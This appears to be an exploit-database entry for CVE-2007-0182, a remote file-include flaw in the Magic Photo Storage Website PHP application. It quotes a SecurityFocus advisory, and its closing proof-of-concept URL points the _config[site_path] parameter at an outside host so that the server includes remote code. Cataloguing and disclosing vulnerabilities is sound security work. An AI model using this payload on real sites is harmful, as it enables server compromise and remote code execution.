Magic Photo Storage Website - '/user/user_membership_password.php?_config[site_path]' Remote File In
| EKU-ID: 34598 | CVE: CVE-2007-0182;OSVDB-33439 | OSVDB-ID: |
| Author: IbnuSina | Published: 2007-01-09 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 34598 | CVE: CVE-2007-0182;OSVDB-33439 | OSVDB-ID: |
| Author: IbnuSina | Published: 2007-01-09 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. http://www.example.com/path/user/user_membership_password.php?_config[site_path]=http://www.example2.com